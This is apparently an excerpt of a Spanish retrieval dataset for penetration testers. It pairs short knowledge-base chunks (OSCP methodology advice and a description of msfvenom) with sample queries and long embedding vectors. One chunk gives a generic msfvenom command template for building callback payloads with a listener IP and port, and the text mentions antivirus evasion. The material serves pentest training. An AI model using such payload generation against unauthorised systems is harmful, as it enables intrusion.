0.08062, 0.04355, -0.03907, -0.05329, -0.02381, 0.1243, 0.00888, -0.00395, 0.01248, -0.00641, -0.02468, -0.09509, -0.01851, -0.00396, -0.05758, -0.21179, 0.00729, -0.04333, -0.06282, -0.01371, -0.01278, -0.02758, -0.01977, 0.07158, -0.20495, 0.10831, 0.00374, 0.08956, -0.02243, -0.06704, -0.06443, 0.1206, -0.0327, -0.01757, -0.01224, 0.12535, 0.03726, -0.01893, 0.016, -0.1839, -0.00667, 0.05292, -0.00123, -0.09191, -0.07468, 0.09164, -0.02235, -0.00315, -0.016, 0.06632, 0.05236, 0.06369, 0.02008, 0.00867, -0.09044, -0.0599, -0.07869, -0.00377, -0.04182, 0.05099, 0.01399, -0.0253, 0.00139, -0.00591, -0.07117, 0.0626, 0.0684, 0.03606, 0.03102, 0.00309, 0.10609, -0.02144, 0.07555, -0.01616, 0.04154, 0.04917, -0.09124, 0.12334, -0.00184, 0.06395, 0.0392, 0.03931, -0.03148, -0.03043, 0.03905, -0.07201, 0.01328, 0.03563, 0.04443, -0.05487, -0.01678, 0.04805, 0.03623, -0.01816, 0.08685, -0.03584, -0.01493, 0.02872, 0.00632, -0.06912, -0.02998, -0.00062, -0.05181, 0.0005, -0.02058, 0.01985, 0.10024, -0.02746, -0.05185, 0.05468, -0.00752, -0.03801, -0.13259, -0.05656, -0.03446, -0.02067, -0.06923, -0.01863, -0.02098, 0.03293, -0.04508, 0.06891, 0.06483, 0.0646, -0.02382, 0.0442, -0.06487, 0.05114, 0.00434, 0.02961, -0.03154, -0.00471, -0.10229, -0.0271, 0.04315, -0.04829, -0.0789, 0.08594, -0.03963, 0.00132, 0.05394, 0.04391, -0.01858, 0.09569, 0.03126, -0.03132, -0.09844, -0.04232, -0.0515, 0.03071, 0.03011, -0.03643, 0.05621, -0.01553, 0.00388, -0.00834, 0.00157, 0.02171, 0.06899, 0.11036, -0.0212, -0.00049, 0.08488, 0.04503, -0.08419, 0.04201, -0.07722, -0.03844, -0.09107, -0.07303, 0.07268, -0.01907, -0.06565, 0.02056, 0.04772, -0.01654, 0.00758, -0.05509, 0.01931, 0.01298, -0.05497, 0.02183, -0.03671, -0.0473, -0.01627, 0.05131, -0.08983, 0.00029, -0.00741, -0.07398, 0.06961, 0.09833, -0.03406, 0.03897, 0.02295, -0.00848, 0.00229, -0.037, 0.04863, 0.04595, 0.06284, 0.00084, -0.0037, -0.00957, 0.06371, 0.05448, 0.03438, 0.0084, -0.05436, 0.02117, 0.04124, 0.00517, -0.05627, -0.02057, -0.03561, -0.01318, 0.0266, -0.01766, -0.05538, 0.007, 0.02845, 0.08065, -0.05585, 0.03066, -0.03845]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Truco meta de meta-trucos\n\nEl truco real del OSCP no es saber 200 tΓ©cnicas. Es **tener una metodologΓ­a repetible**:\n\n```\nEnumeraciΓ³n exhaustiva β†’ vector β†’ foothold β†’\nPrivEsc con script automatizado + revisiΓ³n manual β†’\ndocumentar antes de pasar a siguiente mΓ‘quina\n```\n\nLa gente suspende por **saltarse pasos** o por **obsesionarse con un vector**, no por desconocimiento tΓ©cnico.", "indexar": "que metodo paso a paso sirve para hacer enumeracion exhaustiva en metodos repetibles", "v": [-0.11929, 0.00716, -0.34253, -0.10331, -0.05609, -0.02779, -0.00568, -0.045, -0.14312, -0.11595, -0.15032, 0.02865, 0.15514, -0.00249, 0.13556, -0.02243, 0.10583, 0.03636, 0.07173, -0.07916, -0.03657, -0.14222, -0.14021, 0.00973, -1e-05, 0.04352, 0.00199, -0.03118, -0.08061, 0.09241, -0.11115, 0.12112, 0.04145, -0.12301, -0.15692, 0.06497, -0.06616, -0.01654, -0.10524, 0.10073, -0.09473, -0.01731, -0.15298, 0.0047, -0.02944, -0.03549, 0.04669, -0.01932, -0.11202, 0.10569, 0.05444, 0.00328, -0.03996, -0.06867, -0.08401, -0.07777, -0.04577, -0.07365, -0.11831, -0.03458, 0.10621, -0.03108, 0.06882, 0.04283, 0.02225, -0.02964, 0.0065, 0.00335, -0.04784, 0.09889, 0.0238, 0.01988, 0.07148, 0.0414, -0.04436, -0.05603, 0.05746, 0.01022, 0.04669, -0.02417, -0.08608, -0.08671, -0.10603, -0.05016, -0.13252, 0.03253, 0.07407, -0.04154, 0.09128, -0.08315, -0.13936, -0.01936, 0.0426, -0.0311, 0.02991, 0.02894, 0.02092, 0.07797, 0.02053, 0.07075, 0.10006, -0.0074, -0.11328, 0.05306, 0.08951, 0.06817, 0.02927, 0.04615, -0.01229, -0.09849, 0.00569, 0.0358, -0.00401, 0.00163, -0.06283, -0.04872, -0.0081, 0.02265, -0.09822, 0.02098, -0.01818, 0.06603, -0.07399, 0.02446, -0.01728, -0.06793, 0.03462, 0.0289, -0.00449, 0.0064, 0.02141, 0.00703, -0.06064, 0.02635, 0.02358, -0.05085, 0.08011, 0.0625, -0.04741, -0.05341, -0.01983, 0.03552, -0.0338, -0.03625, 0.0124, -0.06934, 0.0667, -0.06344, -0.02873, -0.06211, -0.07765, 0.03457, -0.00918, -0.01419, -0.04365, -0.0604, 0.09419, -0.00367, -0.03483, 0.07035, -0.03922, 0.05039, 0.02787, 0.0005, 0.03002, -0.02399, 0.00612, -0.04471, -0.07846, -0.04507, -0.01581, 0.01343, -0.016, -0.04866, 0.00779, 0.05063, 0.01475, -0.04915, -0.00577, 0.04985, 0.00155, -0.01117, 0.00987, -0.06, 0.06227, -0.01963, 0.00343, 0.05981, -0.00478, 0.09048, -0.01982, 0.02317, -0.01626, -0.02844, -0.04096, 0.04398, 0.02771, -0.00275, 0.02257, -0.01238, -0.01984, 0.02751, 0.06819, 0.00696, 0.03152, 0.0298, -0.01921, -0.0328, 0.0171, 0.04867, 0.03028, -0.02218, 0.03209, -0.00488, -0.00119, -0.02564, -0.09736, -0.06119, -0.09936, 0.02435, 0.0489, -0.02499, -0.00999, 0.04901, -0.0462, 0.00646, 0.01686, 0.01144, -0.01591, 0.06601, -0.01635, -0.07272, 0.04165, 0.00591, 0.01104, -0.01697, 0.00529, -0.04965, -0.01773, -0.04169, 0.06686, -0.02269, 0.01808, 0.0319, 9e-05, -0.04232, -0.01946, -0.01103, 0.05119, -0.01861, 0.00575, -0.07625, -0.0435, 0.05896, -0.01558, -0.06323]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Truco meta de meta-trucos\n\nEl truco real del OSCP no es saber 200 tΓ©cnicas. Es **tener una metodologΓ­a repetible**:\n\n```\nEnumeraciΓ³n exhaustiva β†’ vector β†’ foothold β†’\nPrivEsc con script automatizado + revisiΓ³n manual β†’\ndocumentar antes de pasar a siguiente mΓ‘quina\n```\n\nLa gente suspende por **saltarse pasos** o por **obsesionarse con un vector**, no por desconocimiento tΓ©cnico.", "indexar": "cual es una tecnica para automatizar el acceso inicial y la explotacion sin saltarme pasos esenciales", "v": [-0.06751, -0.07462, -0.25857, -0.11054, -0.03513, -0.11131, -0.01054, -0.14751, -0.15664, 0.09953, -0.11952, -0.05393, -0.04341, 0.13539, 0.12931, 0.0722, 0.05187, 0.01472, 0.04828, -0.00749, -0.01052, -0.08854, -0.02632, -0.10235, -0.12014, 0.01076, -0.09903, 0.02098, -0.13705, -0.06074, -0.02683, 0.08865, 0.11006, -0.09621, 0.13567, -0.06398, 0.08413, 0.05741, -0.00015, 0.06396, -0.11097, 0.02395, -0.06683, 0.02895, 0.15538, 0.00845, 0.12151, 0.0655, 0.11946, -0.0469, 0.06912, 0.11575, -0.04659, -0.19935, -0.02705, -0.07476, 0.17558, -0.07618, 0.03518, 0.06605, 2e-05, -0.01223, 0.02704, 0.00738, -0.07452, -0.00691, 0.05822, -0.02644, -0.01493, 0.08137, 0.03369, 0.0271, -4e-05, 0.06627, 0.06091, -0.03017, -0.0639, -0.01659, 0.01227, 0.09107, -0.02536, 0.03889, 0.07344, -0.00641, -0.00518, -0.11956, 0.04256, -0.03299, -0.00198, -0.03913, 0.08635, -0.01215, -0.01386, -0.00433, 0.0207, -0.0305, 0.00346, -0.07013, -0.10616, 0.06098, -0.00641, -0.03116, -0.13725, 0.1624, 0.03744, -0.01234, -0.00148, -0.03225, -0.02045, -0.1261, -0.03308, 0.05183, -0.01991, -0.08269, -0.02663, -0.04325, -0.09209, -0.07417, -0.15304, -0.03367, -0.01103, -0.04374, 0.05755, -0.08964, 0.02347, -0.01452, 0.04423, 0.03716, 0.0107, -0.00976, 0.03098, 0.02197, -0.01529, -0.02773, 0.01337, -0.01581, 0.0607, -0.05589, -0.02874, -0.03103, 0.01826, 0.06868, -0.02333, -0.08269, 0.06688, 0.01537, 0.04151, -0.02146, -0.02489, 0.01607, -0.0921, -0.00981, 0.03713, 0.05225, 0.00751, -0.09092, 0.01445, 0.06359, -0.04787, 0.07985, 0.05156, 0.03072, -0.01784, -0.02171, -0.05384, -0.01114, -0.00194, -0.02041, -0.03031, -0.01702, 0.04205, -0.01362, -0.01175, 0.06346, 0.03795, -0.0111, -0.0472, -0.04062, -0.00974, 0.00107, 0.00162, -0.04761, 0.03769, 0.00172, 0.01599, -0.00743, -0.01021, -0.07782, -0.04043, 0.11019, -0.03689, -0.03211, -0.14253, 0.00682, 0.02439, -0.01203, 0.0064, -0.03951, 0.02191, -0.04453, 0.05035, 0.02826, -0.03126, -0.04516, 0.07505, 0.01055, 0.02328, -0.02958, -0.08113, -0.01236, 0.02226, -0.0309, 0.07063, -0.0046, -0.05109, -0.00397, 0.01196, 0.02958, -0.04424, -0.00485, 0.04872, 0.01972, 0.06218, -0.01871, 0.00823, -0.01105, 0.03304, 0.02637, 0.03194, -0.00188, -0.07732, -0.00271, 0.03341, 0.02462, 0.03745, -0.03229, 0.04502, -0.04667, -0.06494, -0.02836, 0.06778, 0.07678, -0.00688, -0.03437, -0.02764, 0.0042, -0.07172, 0.02104, 0.02111, -0.02735, 0.00049, 0.03801, 0.02113, 0.02939, 0.04851, -0.03027]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Truco meta de meta-trucos\n\nEl truco real del OSCP no es saber 200 tΓ©cnicas. Es **tener una metodologΓ­a repetible**:\n\n```\nEnumeraciΓ³n exhaustiva β†’ vector β†’ foothold β†’\nPrivEsc con script automatizado + revisiΓ³n manual β†’\ndocumentar antes de pasar a siguiente mΓ‘quina\n```\n\nLa gente suspende por **saltarse pasos** o por **obsesionarse con un vector**, no por desconocimiento tΓ©cnico.", "indexar": "como puedo montar un flujo de trabajo con script para revisar manualmente las vulnerabilidades", "v": [0.20994, 0.10269, -0.27737, -0.13972, -0.03429, -0.02412, -0.05172, 0.01166, -0.11459, -0.14293, 0.00737, -0.07856, 0.0279, -0.02839, 0.06442, 0.0783, 0.01127, -0.13533, -0.03613, 0.00153, -0.0579, -0.16555, -0.04039, -0.04728, -0.0496, 0.06341, 0.03926, -0.01053, -0.12187, -0.03625, 0.06913, 0.10569, 0.16747, 0.00337, 0.02402, 0.05939, -0.029, 0.04751, -0.00265, 0.10143, 0.01507, 0.09762, -0.12496, 0.06769, -0.0533, -0.06366, 0.04064, -0.11777, -0.04294, 0.09227, 0.03216, 0.01046, -0.08239, -0.04996, -0.09684, -0.0049, 0.18305, -0.07044, 0.01747, 0.01113, 0.04404, 0.1652, 0.01444, 0.06625, 0.01185, 0.01433, 0.00119, -0.03797, -0.08737, 0.11332, -0.00756, -0.02454, -0.13111, 0.00191, -0.03725, -0.00122, -0.04185, 0.03196, 0.05704, -0.00438, -0.07139, 0.00735, 0.05597, 0.10035, -0.14706, -0.13818, 8e-05, -0.0825, -0.0067, -0.0258, 0.02712, -0.05302, 0.02715, -0.04399, -0.00381, 0.01337, 0.08629, 0.08347, -0.05923, -0.00906, -0.03356, -0.03929, 0.05178, 0.12206, 0.08474, 0.09645, 0.03886, 0.06436, -0.02215, -0.08007, -0.07875, 0.06375, -0.08612, 0.00784, -0.04998, -0.03225, -0.06607, -0.01668, 0.07084, -0.0557, -0.0743, -0.03758, 0.00905, 0.00453, -0.00814, -0.10588, 0.0582, 0.0684, 0.00122, -0.03478, -0.05695, 0.03338, -0.10141, 0.01998, 0.02757, 0.06362, 0.00688, -0.03099, -0.04009, -0.01567, 0.04558, 0.02975, 0.07045, 0.04012, 0.07036, 0.00558, 0.02311, -0.09974, -0.04979, -0.03036, 0.01828, 0.05957, 0.03852, 0.06611, -0.02403, -0.0031, 0.01547, 0.0344, -0.02057, 0.06116, 0.05912, 0.03064, -0.02906, 0.05468, -0.0046, -0.01832, -0.04183, -0.01894, 0.1091, -0.01625, -0.04228, 0.00655, 0.02084, -0.03521, 0.03109, -0.03952, 0.04567, -0.02448, 0.03248, 0.01393, 0.01683, 0.00242, -0.0154, -0.00121, -0.01852, -0.02034, 0.0629, -0.004, 0.03768, 0.0897, 0.02586, 0.01389, -0.00908, 0.01421, 0.04006, -0.04544, -0.03642, -0.00157, -0.04987, -0.01832, -0.00614, -0.00268, -0.04145, -0.04616, 0.06013, 0.03511, -0.04592, 0.05181, -0.00057, 0.06767, 0.06946, -0.06197, 0.07512, -0.04065, 0.0053, 0.00949, -0.00265, -0.03365, 0.00063, -0.01107, 0.00858, -0.02187, 0.11595, -0.03183, -0.02775, -0.02173, 0.05331, -0.00441, 0.02418, 0.07968, 0.01405, 0.04162, -0.07353, -0.04933, 0.06574, 0.05287, 0.03486, 0.00861, -0.00128, -0.02243, 0.08388, 0.03291, -0.01144, -0.09639, -0.031, -0.02818, -0.07591, 0.03836, -0.04336, -0.04727, -0.03669, 0.04253, -0.00921, -0.0494, 0.01468, -0.08638]} -{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# msfvenom\n\n> El generador de payloads. Lo usas en Buffer Overflow, AV evasion, Client-side attacks, Exploits conocidos y con el handler de Metasploit.", "indexar": "que programa hay para generar payloads", "v": [0.10034, 0.04327, -0.10405, -0.13028, 0.0428, -0.01949, 0.14967, -0.0227, -0.10768, -0.0156, -0.04189, 0.05986, -0.00126, 0.00659, -0.12284, 0.07463, -0.0638, -0.06304, -0.01451, 0.05317, -0.02785, 0.09888, 0.00515, -0.09218, -0.00112, 0.15203, -0.02033, -0.08571, -0.14931, 0.0651, 0.05926, 0.04608, 0.06485, -0.12222, -0.01812, 0.0126, 0.04272, 0.12173, 0.00111, 0.05062, 0.01455, 0.06104, -0.10775, 0.05085, 0.0993, 0.00915, 0.10194, 0.02719, 0.03045, -0.12437, 0.04559, 0.09512, 0.01085, 0.05087, 0.05788, -0.08917, 0.01016, -0.13967, -0.11582, 0.04875, -0.02017, 0.13656, 0.02592, -0.0691, -0.0419, -0.03555, 0.0736, 0.04901, -0.06603, -0.03961, 0.01327, -0.03946, 0.03627, 0.04482, 0.03394, 0.00322, -0.06722, 0.02313, 0.03407, 0.09642, 0.01142, -0.01748, 0.0105, 0.10328, -0.06832, 0.01026, 0.08266, 0.02457, 0.04931, -0.06586, 0.00253, 0.01966, -0.03479, 0.16172, -0.00524, -0.04111, 0.15343, -0.01715, 0.0766, 0.07904, 0.03328, -0.04854, 0.06303, 0.01858, 0.04079, 0.12377, 0.10874, -0.09747, 0.00498, 0.03561, 0.09527, -0.08087, 0.05832, 0.00116, -0.12337, -0.06317, 0.00071, 0.05037, 0.07864, -0.08226, -0.08153, 0.07854, -0.00833, 0.03033, 0.07757, -0.08059, -0.08895, 0.11147, 0.01559, 0.10418, -0.00751, 0.07227, 0.02614, -0.00882, -0.06243, -0.102, 0.10257, -0.01511, -0.01643, -0.01137, 0.06014, 0.09896, 0.08905, 0.03537, 0.00412, 0.02088, -0.01636, -0.07743, -0.05413, 0.01819, 0.0486, 0.0211, -0.04083, 0.00179, -0.0735, -0.06011, 0.08719, 0.01524, -0.02417, 0.00811, -0.03162, 0.05026, -0.0685, -0.06298, 0.05778, -0.02578, -0.03095, 0.02195, 0.01661, 0.12746, -0.02105, 0.01888, 0.04923, -0.06129, 0.0109, -0.02372, -0.0486, -0.10369, 0.04275, -0.01286, -0.17137, 0.03862, 0.06738, 0.06425, -0.0383, -0.06711, -0.05021, 0.07183, 0.06615, 0.04955, 0.03582, 0.05231, -0.02303, -0.07723, -0.02237, -0.02972, -0.03873, 0.02337, 0.06446, -0.00191, 0.01166, -0.03811, -0.01589, -0.00785, -0.00135, 0.06267, -0.03852, -0.00444, 0.08472, 0.05255, 0.06996, -0.08539, 0.06392, -0.01964, -0.04657, 0.00768, -0.03221, 0.02483, 0.05148, 0.10059, -0.00915, 0.00718, 0.04994, 0.01097, -0.03667, -0.01185, 0.06184, 0.05116, 0.09018, -0.00312, 0.00169, -0.00269, -0.01338, -0.01362, 0.05667, 0.01741, -0.00064, -0.01384, -0.04624, -0.05278, 0.02065, 0.0189, -0.05136, -0.10458, -0.02022, 0.0068, -0.00303, 0.04354, 0.01092, 0.0255, -0.03172, 0.09136, -0.0118, -0.02243, 0.06756, 0.00955]} -{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# msfvenom\n\n> El generador de payloads. Lo usas en Buffer Overflow, AV evasion, Client-side attacks, Exploits conocidos y con el handler de Metasploit.", "indexar": "con que puedo crear un exploit conocido", "v": [-0.0571, 0.13312, -0.30421, -0.02926, 0.03117, -0.04487, -0.04525, 0.08932, -0.12312, -0.14465, -0.01004, -0.05116, -0.03395, 0.07919, -0.09642, -0.0128, 0.06832, -0.03223, -0.00907, 0.0045, 0.06616, 0.00934, 0.13657, -0.01668, 0.00294, -0.03327, -0.01482, 0.02906, -0.04817, 0.05115, -0.04512, 0.15771, -0.03527, -0.06896, 0.08462, -0.00416, 0.09232, -0.01304, -0.01146, 0.08501, -0.02836, -0.05, -0.08325, 0.0812, 0.00023, 0.08977, -0.1305, -0.03964, -0.03096, 0.06291, 0.02323, -0.03995, -0.24818, -0.09363, 0.07075, -0.05967, 0.08, -0.02998, -0.1249, 0.08729, -0.02339, -0.03061, -0.00197, -0.02515, 0.01826, -0.10484, 0.00872, 0.08588, -0.06608, 0.07104, -0.02645, 0.06003, -0.03311, -0.01445, 0.10313, 0.04458, 0.0001, -0.00642, -0.06512, -0.04845, -0.03315, -0.08486, -0.06118, -0.06166, -0.0574, -0.07123, 0.02936, -0.05043, -0.00022, -0.1045, 0.03554, -0.01066, -0.07272, -0.00478, 0.03432, 0.06237, 0.11222, -0.00363, -0.10791, 0.07877, -0.09583, -0.01394, -0.11408, 0.08732, 0.08048, 0.0361, 0.05807, -0.05845, 0.01417, -0.05421, -0.00981, 0.0097, -0.06319, -0.04321, -0.04554, 0.04479, -0.07208, -0.02074, 0.04048, 0.04111, -0.06872, -0.08078, -0.03808, 0.01947, -0.00054, -0.03948, -0.04057, 0.08219, 0.03595, -0.0229, -0.01874, 0.01734, 0.01666, -0.02239, 0.03405, -0.00103, 0.02338, -0.02747, 0.0018, -0.03642, 0.05582, 0.12301, -0.01871, -0.05009, 0.00306, 0.08159, -0.05868, -0.11622, -0.01753, -0.01636, -0.07035, 0.00703, -0.03643, 0.07136, -0.11383, 0.01022, 0.04271, -0.03325, 0.08393, 0.09943, -0.10619, 0.07724, -0.05855, 0.03336, -0.03525, -0.01931, -0.0779, -0.06669, 0.07047, 0.07226, -0.05442, 0.05431, 0.04695, -0.01359, 0.07154, -0.04291, -0.05954, -0.0558, 0.04349, -0.02925, -0.06259, -0.04683, -0.08741, 0.00678, -0.05683, -0.0679, 0.0898, 0.00198, 0.04065, 0.02427, 0.00643, 0.02245, 0.01856, 0.00599, -0.04422, -0.03573, 0.01416, 0.02371, 0.04572, -0.03361, 0.01091, 0.03235, -0.02941, -0.06111, 0.03782, -0.02221, -0.08424, 0.10718, -0.09182, 0.06666, 0.10489, -0.04677, 0.04866, -0.05308, 0.0024, 0.04144, 0.06097, -0.0216, -0.01524, -0.02651, -0.0259, 0.07573, 0.09768, -0.01292, -0.03531, -0.00264, 0.00723, 0.02093, 0.01665, 0.00847, -0.04705, 0.0236, -0.01913, -0.0624, 0.05662, 0.01061, 0.01847, -0.05924, -0.06665, 0.01994, 0.00445, 0.05844, -0.01462, -0.03598, 0.00877, -0.04979, -0.06319, 0.03463, -0.03035, -0.07829, -0.00405, 0.06963, 0.05843, -0.04789, 0.03265, -0.01377]} -{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# msfvenom\n\n> El generador de payloads. Lo usas en Buffer Overflow, AV evasion, Client-side attacks, Exploits conocidos y con el handler de Metasploit.", "indexar": "cual es una herramienta para la evasiΓ³n de antivirus", "v": [-0.12966, -0.03614, -0.08444, -0.09219, 0.00747, -0.00885, -0.04911, -0.07732, -0.06209, -0.02425, -0.01812, -0.21352, -0.05152, 0.05721, 0.09636, 0.04727, 0.17072, -0.11138, 0.05266, 0.1751, -0.02605, 0.0314, -0.12056, 0.01892, -0.093, 0.11852, -0.04578, 0.1454, -0.10511, 0.07089, -0.03757, 0.05825, 0.02289, -0.04835, -0.08239, 0.03143, -0.03453, 0.04452, 0.03809, 0.05913, 0.08825, -0.02249, -0.02756, 0.00044, -0.00333, -0.08382, -0.0302, -0.00647, 0.06832, 0.08239, -0.12728, -0.04596, -0.0783, -0.02929, 0.01315, -0.17381, 0.07923, -0.16502, 0.08664, -0.04627, -0.17644, 0.08952, -0.09158, 0.00707, -0.043, -0.02193, -0.00197, -0.13368, -0.09035, 0.06549, 0.00214, 0.06019, 0.01845, -0.06784, -0.0314, -0.10937, -0.02468, -0.0062, 0.02447, 0.03902, 0.05433, 0.0188, 0.00956, 0.00016, -0.15082, -0.10849, 0.03484, 0.01492, 0.00223, -0.05683, -0.10105, 0.03857, -0.07852, 0.05843, 0.04763, -0.07902, 0.10337, 0.02539, -0.04138, -0.01368, 0.13667, -0.08221, -0.12307, 0.13118, -0.0747, -0.12684, -0.09036, 0.01874, -0.08641, 0.01503, 0.05453, -0.01184, 0.02154, 0.0001, 0.02622, -0.0432, 0.01807, -0.08507, 0.00109, -0.07468, 0.02279, 0.04974, -0.12794, -0.02983, 0.07708, -0.02823, -0.04178, 0.08854, -0.06049, -0.08079, 0.02609, -0.11511, -0.0757, 0.0065, -0.06046, -0.03159, 0.06174, -0.12218, -0.05255, -0.03965, 0.01911, 0.00269, -0.01527, -0.00571, 0.05018, -0.0207, 0.01553, -0.05031, -0.05837, 0.03445, 0.07037, 0.00055, 0.00865, 0.04569, -0.03387, 0.03698, -0.07738, 0.02238, -0.02347, 0.00095, -0.02823, -0.0074, 0.07864, -0.01359, -0.00915, -0.08089, 0.03287, 0.01948, 0.02465, 0.05263, 0.03682, 0.01, 0.04068, -0.06048, -0.04353, -0.05556, -0.03566, -0.04635, -0.02051, -0.05632, 0.03699, -0.01122, -0.00541, -0.04162, 0.02729, -0.04843, 0.05265, -0.00154, 0.0043, 0.02935, -0.02689, -0.00146, -0.07208, -0.04812, 0.0423, -0.03003, -0.01316, -0.08972, 0.08903, 0.04314, -0.06943, -0.03574, -0.05351, -0.04087, 0.06057, 0.08993, 0.01162, -0.04966, -0.0129, 0.02091, 0.04943, 0.03523, -0.02132, 0.02007, -0.0047, -0.04892, -0.01576, -0.01365, 0.00083, -0.02595, 0.04583, -0.00762, 0.04689, -0.06291, -0.05591, 0.0104, -9e-05, -0.00891, 0.01187, -0.05237, -0.00748, -0.04779, 0.02754, -0.04326, 0.00199, -0.00111, 0.01158, -0.04549, -0.02289, 0.01053, -0.03639, 0.05063, 0.07334, -0.07832, -0.06128, -0.00551, 0.0024, -0.00971, -0.01086, -0.0548, -0.04068, -0.00237, 0.00778, 0.01647, 0.04242, 0.00359]} -{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## AnatomΓ­a\n```bash\nmsfvenom -p LHOST=TU_IP LPORT=443 -f -o salida [-b badchars] [-e encoder]\n```", "indexar": "que herramienta me ayuda a generar payloads personalizados para pruebas de penetraciΓ³n?", "v": [0.18513, 0.12619, -0.23218, -0.24105, 0.0422, 0.0326, 0.02053, -0.01425, -0.02956, -0.0345, -0.06895, 0.10631, -0.01522, -0.05113, -0.10573, 0.04017, -0.03678, -0.06642, -0.04367, 0.03132, 0.00349, 0.0193, -0.15617, -0.118, -0.03821, 0.15474, 0.00762, -0.01649, -0.18496, 0.01432, -0.02858, 0.00223, 0.01042, -0.02728, -0.11957, -0.04029, -0.04403, 0.0741, 0.04196, 0.15219, 0.00366, 0.01334, -0.04427, 0.0411, 0.13414, 0.04341, 0.0513, 0.08159, -0.02574, -0.0328, -0.00908, -0.07592, -0.08691, -0.02475, -0.06145, -0.1866, 0.22275, -0.15685, -0.03944, -0.0619, -0.09833, 0.03148, -0.00831, -0.0005, 0.02781, -0.05324, 0.04069, -0.01232, -0.05632, 0.02045, -0.00085, 0.00869, 0.0146, -0.05466, -0.04936, -0.02693, 0.02872, 0.07332, 0.07272, 0.05835, 0.07533, 0.03258, -0.02656, 0.00616, -0.06119, -0.03707, 0.05092, 0.02837, 0.10033, -0.14081, 0.02754, -0.0257, -0.06257, 0.08349, -0.03647, 0.01185, 0.11242, -0.12448, 0.04633, -0.01063, 0.14751, -0.05198, -0.01273, -0.00998, 0.06331, 0.00469, -0.01171, -0.08576, -0.05162, -0.04203, 0.14931, -0.00038, 0.02059, -0.02434, -0.08409, 0.02743, 0.00813, -0.01943, -0.02772, -0.11266, -0.0154, 0.03279, -0.05018, -0.00971, -0.0478, -0.09526, -0.04816, 0.0573, -0.00043, 0.01783, 0.05648, 0.04212, -0.03514, 0.05255, 0.02189, -0.00828, 0.04269, -0.10869, -0.0405, 0.01248, 0.05766, 0.0271, 0.03505, -0.07559, 0.0132, 0.07638, -0.02565, -0.041, -0.05852, 0.0203, 0.02788, -0.03863, -0.01415, 0.04346, -0.06399, -0.07172, 0.0494, 0.02109, -0.0385, 0.03839, -0.03422, 0.00024, -0.00717, -0.01822, 0.01797, 0.01614, -0.00259, -0.03435, -0.00064, 0.07908, -0.00909, -0.00781, 0.02322, -0.01363, 0.03314, -0.04899, -0.045, -0.05799, -0.03967, -0.05127, -0.07816, 0.01116, -0.01661, -0.03297, 0.04848, -0.06506, 0.00474, -0.02079, 0.08853, 0.07672, 0.03315, 0.06327, -0.01685, -0.07061, 0.01353, 0.0098, -0.02646, 0.00836, -0.00035, -0.01047, 0.02754, -0.08129, 0.00608, -0.05451, -0.03369, 0.04309, -0.06553, -0.02171, 0.0456, -0.0332, 0.05494, -0.01036, 0.05683, -0.0506, -0.05999, 0.00184, -0.00996, 0.01974, -0.07266, 0.0305, 0.01827, 0.01383, 0.06872, -0.00849, -0.04861, 0.08868, 0.05077, 0.01562, 0.02136, -0.00311, 0.06418, -0.00702, -0.0187, -0.03565, 0.07856, -0.03862, -0.00634, 0.00317, -0.05499, -0.01927, 0.0191, 0.04713, -0.02698, -0.02219, -0.03158, -0.04426, 0.03004, -0.01885, -0.0524, -0.02545, -0.01009, 0.05208, 0.01339, -0.0711, 0.10006, -0.03729]} -{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## AnatomΓ­a\n```bash\nmsfvenom -p LHOST=TU_IP LPORT=443 -f -o salida [-b badchars] [-e encoder]\n```", "indexar": "con quΓ© puedo crear un payload especΓ­fico con una opciΓ³n de codificador?", "v": [-0.03853, 0.14673, -0.1735, 0.06005, 0.02082, -0.10338, 0.15529, 0.02675, -0.17181, -0.13478, -0.12251, -0.06926, 0.0368, -0.06135, -0.08956, 0.0321, -0.01397, -0.08485, -0.03361, 0.059, 0.00516, -0.108, -0.03918, -0.02691, 0.02216, 0.10344, 0.03251, 0.01541, -0.25635, 0.00977, -0.02503, 0.12616, 0.05148, -0.01835, -0.05034, 0.0438, 0.04803, 0.19368, -0.13175, 0.05882, -0.05515, 0.07549, -0.08097, 0.14894, 0.09245, 0.05597, -0.01089, 0.08247, 0.04704, -0.01748, 0.10207, 0.03024, -0.13797, 0.00689, -0.04609, -0.02802, 0.10322, -0.06644, 0.0011, 0.05592, -0.01042, 0.10021, -0.06053, -0.00357, 0.03038, -0.01243, 0.00281, 0.03699, 0.00601, -0.06743, 0.02513, -0.09219, -0.01855, 0.01875, 0.07018, 0.12638, -0.05681, 0.00901, 0.04855, 0.06432, 0.10803, 0.00078, -0.0809, -0.04054, -0.00428, -0.04933, 0.02552, 0.01356, 0.03713, -0.13098, 0.04742, -0.02974, -0.05959, 0.08046, -0.06735, 0.00835, 0.07125, -0.02847, -0.03635, 0.03637, 0.0525, -0.00997, 0.04999, 0.08969, 0.07578, 0.01652, 0.05258, -0.10322, 0.02106, -0.10391, 0.09047, -0.07177, 0.03821, -0.03597, -0.06965, -0.11807, -0.0649, 0.03446, 0.05597, 0.02179, -0.05153, 0.01074, 0.0457, 0.02477, 0.04091, -0.04531, -0.05489, 0.10816, -0.02256, 0.05468, -0.06852, 0.08486, 0.00393, -0.06932, 0.00726, -0.03155, 0.09916, 0.00742, -0.02336, 0.04586, 0.0616, 0.01301, 0.04431, 